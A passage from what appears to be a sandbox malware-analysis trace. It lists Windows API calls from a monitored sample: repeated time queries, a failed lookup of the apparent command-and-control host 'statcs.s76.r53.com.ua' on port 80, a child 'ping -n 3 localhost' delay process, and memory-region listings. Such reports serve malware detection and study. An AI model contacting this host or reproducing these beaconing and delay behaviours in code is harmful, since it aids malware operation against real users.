wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 
lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, 
wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, 
wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) 
[0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: 
lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 
lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] VirtualFree (lpAddress=0x520000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.696] 
FreeLibrary (hLibModule=0x76910000) returned 1 [0117.696] LocalFree (hMem=0x724448) returned 0x0 [0117.696] FreeLibrary (hLibModule=0x76910000) returned 1 [0117.696] LocalFree (hMem=0x724438) returned 0x0 [0117.696] ExitProcess (uExitCode=0x0) Thread: id = 99 os_tid = 0xe94 [0117.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x618514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0117.186] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x651ffc, cbMultiByte=27, lpWideCharStr=0x17ded38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0117.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0117.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x60a714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0117.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x61867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0117.186] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x17dfb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x17dfbac | out: ppResult=0x17dfbac*=0x0) returned 11001 [0117.259] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x17dfb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x17dfbac | out: ppResult=0x17dfbac*=0x0) returned 11001 [0117.355] getnameinfo (in: pSockaddr=0x17dfc14, SockaddrLength=0x0, pNodeBuffer=0x56831c, NodeBufferSize=0x401, pServiceBuffer=0x635124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="", pServiceBuffer="") returned 10047 [0117.355] htons (hostshort=0x0) returned 0x0 [0117.355] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0117.355] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] SetEvent (hEvent=0x84) returned 1 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] 
GetCurrentThreadId () returned 0xe94 [0117.355] CloseHandle (hObject=0xb8) returned 1 [0117.355] RtlExitUserThread (Status=0x0) Thread: id = 101 os_tid = 0xeac Process: id = "58" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16880" os_pid = "0xe70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "54" os_parent_pid = "0xe2c" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8522 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8523 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8524 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8525 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 8526 start_va = 0x240000 end_va = 0x247fff entry_point = 0x240000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 8527 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8528 start_va = 0x77470000 end_va = 
0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8529 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8530 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 8531 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8532 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8533 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8534 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8535 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 8536 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 8537 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8538 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8539 start_va = 0x75540000 end_va = 0x75589fff entry_point 
= 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8540 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8541 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8542 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8543 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8544 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8545 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8546 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8547 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8548 start_va = 
0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8549 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8550 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8551 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8552 start_va = 0x100000 end_va = 0x1c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 8553 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8554 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8555 start_va = 0x1d0000 end_va = 0x1d6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 8556 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 8557 start_va = 0x1f0000 end_va = 0x1f2fff entry_point = 0x1f0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 8558 start_va = 0x200000 
